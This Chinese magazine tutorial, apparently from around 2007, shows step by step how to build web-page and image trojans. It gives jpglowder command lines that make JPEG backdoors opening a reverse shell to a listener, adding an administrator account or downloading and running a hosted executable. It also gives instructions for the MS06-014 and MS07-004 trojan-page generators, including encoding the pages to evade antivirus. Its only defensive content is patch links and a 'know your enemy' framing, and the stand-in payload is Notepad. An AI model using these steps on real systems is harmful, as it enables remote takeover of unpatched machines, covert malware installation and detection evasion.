攻防課堂

網(wǎng)絡(luò)上到處都可以下載到各種木馬，任何人都可以對(duì)其進(jìn)行包裝和捆綁，所以軟件木馬的變種和發(fā)展非常快，防范起來(lái)也比較麻煩，要想“百毒不侵”，就必須知己知彼。下面我們就來(lái)詳細(xì)分析一下木馬的主要偽裝形式、誘騙運(yùn)行手段和藏身之處。

為保障大家電腦安全，我們以Windows的記事本程序替代木馬主程序。重點(diǎn)分析木馬入侵的方式。同時(shí)建議大家最好在虛擬機(jī)上做這些實(shí)驗(yàn)(這里假設(shè)虛擬機(jī)的IP是192.168.1.2，主機(jī)的IP是192.168.1.1)。

什么是網(wǎng)頁(yè)木馬

網(wǎng)頁(yè)木馬是利用網(wǎng)頁(yè)作為傳播手段的，早期的網(wǎng)頁(yè)木馬均是使用SCRIPT語(yǔ)言編寫(xiě)的一些惡意代碼，利用IE的漏洞來(lái)實(shí)現(xiàn)木馬的植入。當(dāng)用戶(hù)登錄某些含有網(wǎng)頁(yè)木馬的網(wǎng)站時(shí)，有的是直接執(zhí)行頁(yè)面內(nèi)的shellcode，有的是悄悄下載木馬程序并自動(dòng)運(yùn)行。這種網(wǎng)頁(yè)病毒容易編寫(xiě)和修改，每次出現(xiàn)新的IE漏洞，都有大面積的網(wǎng)站被掛馬，即使是許多著名的門(mén)戶(hù)網(wǎng)站也不能幸免。

這種非法惡意程序能夠得以自動(dòng)執(zhí)行，在于它完全不受用戶(hù)的控制。一旦瀏覽含有該病毒的網(wǎng)頁(yè)，即可以在不知不覺(jué)的情況下馬上中招，給用戶(hù)的系統(tǒng)帶來(lái)不同程度的破壞。令你苦不堪言，甚至損失慘重?zé)o法彌補(bǔ)。

既然是網(wǎng)頁(yè)木馬，那么很簡(jiǎn)單的說(shuō)，它就是一個(gè)網(wǎng)頁(yè)，但在這個(gè)網(wǎng)頁(yè)運(yùn)行于本地時(shí)，它所執(zhí)行的操作就不僅僅是下載后再讀出，伴隨著前者的操作背后，就是木馬的下載，然后執(zhí)行，悄悄地修改你的注冊(cè)表，等等。那么，這類(lèi)網(wǎng)頁(yè)都有什么特征呢?

1)美麗的網(wǎng)頁(yè)名稱(chēng)。

2)通過(guò)電子郵件發(fā)送該木馬網(wǎng)頁(yè)的網(wǎng)址。

3)在論壇上參與熱門(mén)的話(huà)題，并提供給其它人木馬網(wǎng)頁(yè)的網(wǎng)址。

4)使用QQ聊天將這個(gè)網(wǎng)址發(fā)送給對(duì)方。

5)加入到流媒體文件中。

下面是一些曾經(jīng)風(fēng)光一時(shí)的網(wǎng)頁(yè)木馬，雖然到筆者發(fā)稿之日，Microsoft已經(jīng)發(fā)布了所有的相關(guān)補(bǔ)丁，但即使是這樣，它們?cè)谀壳跋喈?dāng)多的計(jì)算機(jī)上依然有效。特別是對(duì)那些經(jīng)常重裝計(jì)算機(jī)的用戶(hù)和采用系統(tǒng)還原功能的網(wǎng)吧和學(xué)校網(wǎng)絡(luò)機(jī)房，這些木馬依然具有很強(qiáng)的破壞性。

實(shí)驗(yàn)程序：圖片木馬制作工具Ipglowder

測(cè)試地址：http://218.86.126.77/cpcfan/2007/3/mm.exe(偽木馬程序)

補(bǔ)丁發(fā)布時(shí)間：2004年9月

補(bǔ)丁下載地址：

http://www.microsoft.com/athome/security/update/bulletins/200409_jpeg_t001.mspx

Windows的JPEG圖像漏洞可以導(dǎo)致系統(tǒng)被入侵和遠(yuǎn)程執(zhí)行惡意代碼。入侵者可以將后門(mén)代碼插入到圖片中間接運(yùn)行，該漏洞主要涉及操作系統(tǒng)中一個(gè)名為GdiPlus.d11的文件。由于眾多軟件都調(diào)用了這個(gè)動(dòng)態(tài)鏈接庫(kù)處理IPEG圖片，使得該漏洞的涉及面非常廣，如Windows XP SP1、MS Office、QQ2004等等。所以可以將后門(mén)通過(guò)這個(gè)漏洞原理來(lái)插入到圖片中，這樣存在此漏洞的程序會(huì)無(wú)條件運(yùn)行圖片中的后門(mén)程序，從而控制受影響的系統(tǒng)。

這里介紹的是jpglowder的使用，jpglowder的參數(shù)主要有：

參數(shù)1：-r your_ip or-b，這里使用-r和-b選項(xiàng)之后，就可以將端口反彈的功能加入到即將生成的圖片后門(mén)中。

參數(shù)2：-a or-d，使用-a選項(xiàng)之后，生成一個(gè)可以自動(dòng)添加管理員賬號(hào)的圖片后門(mén)，添加的管理員賬號(hào)和密碼均為X。使用-d選項(xiàng)之后，將生成一個(gè)能下載指定木馬地址并運(yùn)行的圖片后門(mén)，參數(shù)用法是：-d木馬的URL地址。

參數(shù)3：-p(optional)，這個(gè)選項(xiàng)運(yùn)行你修改默認(rèn)的連接端口。

制作生成后門(mén)的圖片：

1)在本機(jī)輸入命令：jpglowder-r 192.168.1.1-P 8888lxl.jpg，生成一個(gè)后門(mén)具有開(kāi)放8888端口的功能的jPg圖片。

2)在虛擬機(jī)打開(kāi)圖片lxl.jpg。

3)在本機(jī)輸入連接命令：nc.exe-l-p 8888，這樣虛擬機(jī)會(huì)自動(dòng)連接本機(jī)，從而得到權(quán)限。

制作可下載木馬的圖片：

1)在本機(jī)輸入命令：jpglowder -a-dhttp://218.86.126.77/cpcfan/2007/3/mm.exe lx2.jpg2)在虛擬機(jī)打開(kāi)圖片lx2.jPg，如正常的話(huà)會(huì)下載并運(yùn)行木馬mm.exe，由于服務(wù)器上的偽木馬程序是一個(gè)記事本文檔，所以運(yùn)行后的現(xiàn)象是打開(kāi)記事本。

實(shí)驗(yàn)二：Ms06-014木馬制作

實(shí)驗(yàn)程序：MS06-014網(wǎng)頁(yè)木馬生成器

測(cè)試地址：http://218.86.126.77/cPcfan/2007/3/mm.exe(偽木馬程序)

補(bǔ)丁發(fā)布時(shí)間：2006年4月

補(bǔ)丁下載地址：http://WWW.microsoft.com/china/technet/security/bulletin/ms06-014.mspx

Ms06-014漏洞是今年的掛馬王，采用Ms06-014漏洞木馬生成器非常的多，被掛上Ms06-014木馬的著名網(wǎng)站數(shù)不勝數(shù)，制作Ms06-014木馬的步驟非常簡(jiǎn)單：

1)下載一個(gè)MS06-014網(wǎng)頁(yè)木馬生成器。

2)運(yùn)行“MS06-014木馬生成器”，在“木馬地址”中填入已經(jīng)上傳到空間中的木馬網(wǎng)址http://218.86.126.77/cpcfan/2007/3/mm.exe，并勾選下方的“是否隱藏源碼”選項(xiàng)。這個(gè)選項(xiàng)的作用是當(dāng)網(wǎng)頁(yè)木馬運(yùn)行后，會(huì)自動(dòng)清空網(wǎng)頁(yè)源文件，用戶(hù)即使起了疑心也無(wú)法找到痕跡。當(dāng)然清空的是用戶(hù)打開(kāi)的源文件，而網(wǎng)頁(yè)木馬卻不受影響。點(diǎn)擊“生成網(wǎng)馬”按鈕即可在程序的同目錄生成一個(gè)名為muma.htm的網(wǎng)頁(yè)木馬。

3)加密木馬程序還不夠，還需對(duì)網(wǎng)頁(yè)木馬進(jìn)行加密。“MS06-014木馬生成器”的“加密方式”中提供了四種網(wǎng)頁(yè)的加密方式，分別是：空字符加密、轉(zhuǎn)義字符加密、Escape加密和拆分特征碼。這里我們選中“轉(zhuǎn)義字符加密”選項(xiàng)后點(diǎn)擊“加密”按鈕，免殺的網(wǎng)頁(yè)木馬就生成了。將該加密過(guò)的網(wǎng)頁(yè)木馬上傳到網(wǎng)頁(yè)空間中即可。

實(shí)驗(yàn)三：Ms07004網(wǎng)馬制作

實(shí)驗(yàn)程序：Ms07004網(wǎng)馬生成器

補(bǔ)丁發(fā)布時(shí)間：2007年1月

補(bǔ)丁下載地址：http://WWW.microsoft.com/china/technet/security/bulletin/MS07-004.mspx

Microsoft Windows中的矢量標(biāo)記語(yǔ)言(VML)實(shí)施中存在一個(gè)遠(yuǎn)程執(zhí)行代碼漏洞。攻擊者可能通過(guò)構(gòu)建特制的網(wǎng)頁(yè)或HTML電子郵件利用該漏洞，當(dāng)用戶(hù)訪問(wèn)網(wǎng)頁(yè)或查看郵件時(shí)，該漏洞可能允許遠(yuǎn)程執(zhí)行代碼。成功利用此漏洞的攻擊者可以完全控制受影響的系統(tǒng)。MS07004和上一個(gè)漏洞Ms06-014經(jīng)常做在一起對(duì)計(jì)算機(jī)用戶(hù)的威脅非常巨大。

木馬的生成步驟如下：

1)下載Ms07004網(wǎng)馬生成器。

2)運(yùn)行“Ms07004網(wǎng)馬生成器”，輸入木馬程序存放的地址，如：http://218.86.126.77/cpcfan/2007/3/mm.exe

3)Ms07004網(wǎng)馬生成器生成一個(gè)文件zy.htm。

4)把這個(gè)文件zy.htm傳到服務(wù)器上訪問(wèn)或直接運(yùn)行，計(jì)算機(jī)就會(huì)自動(dòng)下載mm.exe并運(yùn)行。

限于篇幅，今天關(guān)于網(wǎng)頁(yè)木馬的制作就講到這里，在下期的文章中，我們會(huì)帶給大家兩個(gè)關(guān)于圖標(biāo)文件視頻的木馬。另外，還會(huì)解決大家的一個(gè)疑問(wèn)：這些木馬究竟是如何“秘密潛入”各大網(wǎng)站的呢?’